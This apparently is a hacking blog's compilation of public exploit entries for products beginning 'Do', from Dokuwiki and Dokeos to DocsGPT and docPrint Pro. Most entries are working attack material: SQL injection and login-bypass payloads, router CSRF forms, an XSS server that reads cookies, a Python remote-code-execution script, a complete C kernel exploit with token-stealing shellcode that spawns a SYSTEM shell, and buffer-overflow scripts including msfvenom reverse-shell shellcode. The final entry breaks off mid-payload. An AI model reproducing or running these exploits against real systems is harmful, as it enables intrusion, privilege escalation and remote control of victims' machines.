# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :
# At login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is username enumeration vulnerability.
# Testing for non-valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=sss
# Response for non-valid user(sss):
<div class="error">Sorry, we can't find this user in our database.</div>
========================================================================
# Testing for valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1
sectok=&do=resendpwd&save=1&login=admin
# Response for valid user (admin):
<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153216
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
curdirpath in slidshow.php is vulnerable to time-based blind sqlinjection
------
POC :
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note : to exploit with sqlmap you should use --tamper=between option to retrieve data
------
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database: 'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'
C:\Users\Mort\Desktop\Apps\sqlmap>
------
/*
Exploit Title - Dokany Stack-based Buffer Overflow Privilege Escalation
Date - 14th January 2019
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://dokan-dev.github.io
Tested Version - 1.2.0.1000
Driver Version - 1.2.0.1000 - dokan1.sys
Software package - https://github.com/dokan-dev/dokany/releases/download/v1.2.0.1000/DokanSetupDbg_redist.exe
Tested on OS - 32bit Windows 7
CVE ID - CVE-2018-5410
Vendor fix url - https://github.com/dokan-dev/dokany/releases/tag/v1.2.1.1000
CERT/CC Vul note - https://www.kb.cert.org/vuls/id/741315
Fixed Version - 1.2.1.1000
Fixed driver ver - 1.2.1.1000
Check blogpost for details:
https://www.greyhathacker.net/?p=1041
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 896
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_w7[] =
{
0x60, // pushad Saves all registers
0x64,0xA1,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax Current _EPROCESS structure
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x89,0x91,0xF8,0x00,0x00,0x00, // mov [ecx+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x61, // popad Restores all registers
0x81,0xc4,0x3c,0x0b,0x00,0x00, // add esp,0xB3c Target frame to return
0x31,0xc0, // xor eax,eax NTSTATUS -> STATUS_SUCCESS
0x5d, // pop ebp Restore saved EBP
0xc2,0x08,0x00 // ret 8 Return cleanly
};
int spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
if (!CreateProcess(NULL, "C:\\Windows\\System32\\cmd.exe", NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return -1;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE *inbuffer;
LPVOID addrtoshell;
printf("-------------------------------------------------------------------------------\n");
printf(" Dokany (dokan1.sys) Stack-based Buffer Overflow Cookie Bypass EoP Exploit \n");
printf(" Tested on 32bit Windows 7 \n");
printf("-------------------------------------------------------------------------------\n");
addrtoshell = VirtualAlloc(NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("\n[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
printf("\n[i] Size of shellcode %d bytes", sizeof(token_steal_w7));
printf("\n[i] Shellcode located at address 0x%p", addrtoshell);
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if(inbuffer == NULL)
{
printf("\n[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
memset(inbuffer, 0x41, BUFSIZE);
printf("\n[i] Buffer located at address 0x%p", inbuffer);
printf("\n[i] Size of total input buffer being sent %d bytes", BUFSIZE);
*(WORD*)(inbuffer) = BUFSIZE; // Size of buffer used by memcpy
*(WORD*)(inbuffer + 2) = BUFSIZE-6; // Size of input buffer, value has to be at most BUFSIZE - 6
*(DWORD*)(inbuffer + 776) = 0x42424242; // cookie
*(DWORD*)(inbuffer + 784) = 0x43434343; // return
*(DWORD*)(inbuffer + 792) = 0x44444444; // IRP
// *(DWORD*)(inbuffer + 892) = 0x45454545; // Exception handler
*(DWORD*)(inbuffer + 892) = (ULONG)addrtoshell; // Shellcode
sprintf(devhandle, "\\\\.\\%s", "Dokan_1");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .\n");
getch();
DeviceIoControl(hDevice, 0x00222010, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("[*] Spawning SYSTEM Shell\n");
spawnShell();
CloseHandle(hDevice);
return 0;
}
# Exploit Title: DODOCOOL DC38 N300 Cross-site Request Forgery
# Date: 17-01-2018
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: DODOCOOL
# Vendor Homepage: www.dodocool.com
# Version: RTN2-AW.GD.R3465.1.20161103
# CVE: CVE-2018-5720
I DESCRIPTION
========================================================================
An issue was discovered in DODOCOOL DC38 3-in-1 N300 Mini Wireless Range
Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery
(CSRF) vulnerability allows remote attackers to hijack the authentication
of users for requests that modify the configuration.
This vulnerability may lead to username and/or password changing, Wi-Fi
password changing, etc.
II PROOF OF CONCEPT
========================================================================
## Change user username and password (test_username:test_password):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.10.1/boafrm/formPasswordSetup"
method="POST">
<input type="hidden" name="submit-url"
value="/setok.htm?bw=main.htm" />
<input type="hidden" name="submit-value" value="" />
<input type="hidden" name="username" value="test_username" />
<input type="hidden" name="newpass" value="test_password" />
<input type="hidden" name="confpass" value="test_password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
## Change WiFi Configuration (WIFI_TEST:TestTest):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.10.1/boafrm/formWlanSetupREP"
method="POST">
<input type="hidden" name="submit-url"
value="/setok.htm?bw=wl_rep.htm" />
<input type="hidden" name="submit-value" value="repset" />
<input type="hidden" name="wl_onoff" value="0" />
<input type="hidden"
name="wps_clear_configure_by_reg" value="0" />
<input type="hidden" name="wlProfileId" value="" />
<input type="hidden" name="wl_mode" value="0" />
<input type="hidden" name="wl_authType" value="auto" />
<input type="hidden" name="wepEnabled" value="ON" />
<input type="hidden" name="weplength" value="" />
<input type="hidden" name="wepformat" value="" />
<input type="hidden" name="wl_wpaAuth" value="psk" />
<input type="hidden" name="wl_pskFormat" value="0" />
<input type="hidden" name="wl_pskValue" value="TestTest" />
<input type="hidden" name="wl_ssid" value="WIFI_TEST" />
<input type="hidden" name="wl_Method" value="6" />
<input type="hidden" name="wep_key" value="" />
<input type="hidden" name="ciphersuite" value="tkip+aes" />
<input type="hidden" name="ciphersuite" value="aes" />
<input type="hidden" name="wpa2ciphersuite" value="tkip+aes" />
<input type="hidden" name="wpa2ciphersuite" value="aes" />
<input type="hidden" name="web_pskValue" value="TestTest" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# # # # #
# Exploit Title: Document Management Template v1.0 for PHPRunner 8.x,ASPRunnerPro 9.x,ASPRunner.NET 8.x or better.- SQL Injection
# Google Dork: N/A
# Date: 07.04.2017
# Vendor Homepage: https://xlinesoft.com/
# Software: https://xlinesoft.com/docmanager
# Demo: https://xlinesoft.com/livedemo/docmanager/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/Share_add.php?hash=[SQL]
# # # # #
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 06/30/2021
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
# Proof of Concept :
http://test.com/PATH/signin
# Username : anything
# Password : ' or '1'='1
# # # # #
# Exploit Title: Doctor Search Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
# Demo: http://fxwebsolution.com/demo/doctorsearch/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/list?city=[SQL]&main_search=
#
# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
#
# # # # #
# # # # #
# Exploit Title: Doctor Patient Project 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 17.08.2017
# Vendor Homepage : http://surajkumar.in/
# Software Link: http://surajkumar.in/product/doctor-patient-project-php/
# Demo: http://surajkumar.in/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands...
# The vulnerability allows an attacker to access the administration panel...
# The vulnerability allows an paitent and doctors users upload arbitrary file...
#
# Vulnerable Source:
# # # # #
# <?php
# ....1
# if(isset($_GET['docID']) && isset($_GET['docname'])){
# $docID=$_GET['docID'];
# $docname=$_GET['docname'];
# $docData=docData($docID);
# ...
# function docData($docID){
# $res=array();
# $query=mysql_query("SELECT * FROM ".USERS.",".DOC." WHERE ".DOC.".doc_id='$docID' AND ".USERS.".id=".DOC.".doc_id");
# if(mysql_num_rows($query)>0){
#
# ....2
# $data['_filename']=$_FILES['_docImage']['name'];
# $data['_filetmp']=$_FILES['_docImage']['tmp_name'];
# $data['_folder']='doc_images';
#
# ....3
# if(isset($_POST['signin'])){
# $data=array();
# $data['user']=$_POST['user'];
# $data['pass']=$_POST['pass'];
# $res=adminLogin($data);
# if($res['bool']==true){
# ....
# ?>
# # # # #
#
# Proof of Concept:
#
# 1:
# http://localhost/[PATH]/single.php?docID=[SQL]
# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-&docname=0x30783330
#
# 2/1:
# http://localhost/[PATH]/patient/profile.php
# http://localhost/[PATH]/patient/pat_images/[FILE].php
#
# 2/2:
# http://localhost/[PATH]/doctor/profile.php
# http://localhost/[PATH]/doctor/doc_images/[FILE].php
#
# 3:
# http://localhost/[PATH]/admin
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# Etc...
# # # # #
# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
# Date: 2020-06-22
# Exploit Author: Amin Sharifi
# Vendor Homepage: https://docsify.js.org
# Software Link: https://github.com/docsifyjs/docsify
# Version: 4.11.4
# Tested on: Windows 10
# CVE : CVE-2020-7680
docsify.js uses fragment identifiers (parameters after # sign) to load
resources from server-side .md files. it then renders the .md file inside
the HTML page.
For example : https://docsify.js.org/#/quickstart sends an ajax to
https://docsify.js.org/quickstart.md and renders it inside the html page.
due to lack of validation it is possible to provide external URLs after the
/#/ and render arbitrary javascript/HTML inside the page which leads to
DOM-based Cross Site Scripting (XSS).
Steps to reproduce:
step 1. setup a server (for example I use flask here, for the POC im
hosting one on https://asharifi.pythonanywhere.com )
step 2. the server should respond to request to /README.md with a crafted
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
also the CORS should be set so that other Origins would be able to send
ajax requests to the server so Access-Control-Allow-Origin must be set to *
(or to the specific domain that you wanna exploit) example code below:
-------------------------------------------------
from flask import Flask
import flask
app = Flask(__name__)
@app.route('/README.md')
def inject():
resp = flask.Response("Html Injection and XSS PoC</p><img src=1
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
------------------------------------------------------
step 3. craft the link for execution of the exploit
for example for https://docsify.js.org website you can create the link as
below
https://docsify.js.org/#//asharifi.pythonanywhere.com/README
(note that the mentioned domain is no longer vulnerable at the time writing
this report)
when a user visits this URL an ajax request will be sent to
asharifi.pythonanywhere.com/README.md and the response of the request will
be rendered inside the webpage which results in XSS payload being executed
on the page.
snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
Mitre CVE entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868
import requests
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091" # Change this
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
'user=1&source=reddit&name=other&data={"source":"reddit",'
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
'"search_queries":[""],"number_posts":10,'
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
try:
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
print(f"[+] Status Code: {response.status_code}")
print("[+] Response Body:")
print(response.text)
except Exception as e:
print(f"[-] Error sending request: {e}")
import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7
# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"
# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)
# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"
# Stack alignment
alignment = "\x54" # push esp
alignment += "\x58" # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50" # push eax
alignment += "\x5c" # pop esp
# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41
# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50" # push eax
# 4F554A42 4F554A42 51554B44
shellcode += zero # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50" # push eax
# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50" # push eax
# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1A27 323A0227 333B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1545 323A1545 333B1545
shellcode += zero # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50" # push eax
# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "\x41" * 2 # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))
# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC)
# Date: 19/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.verypdf.com
# Software: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "DocConverter.py", it will create a new file "DocConverter.txt"
# 2.- Copy the text from the generated DocConverterr.txt file to clipboard
# 3.- Open docPrint Document Converter
# 4.- Go to 'Setting' > 'PDF Security'
# 5.- Mark 'Encrypt PDF File' and paste clipboard in the field 'User Password' or the field 'Master Password' and Click 'OK'
# 6.- Click on 'Add File(s)', and select a supported file, e.g. 'sample.doc'
# 7.- Click on 'Start', you will see a crash
buffer = "\x41" * 3000
f = open ("DocConverter.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-26
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit
# Proof of Concept:
# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open doc2pdf_win.exe and go to File -> Add URL
# 4. Paste the clipboard into the field and click on Ok
#!/usr/bin/python
# encoded egghunter
egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
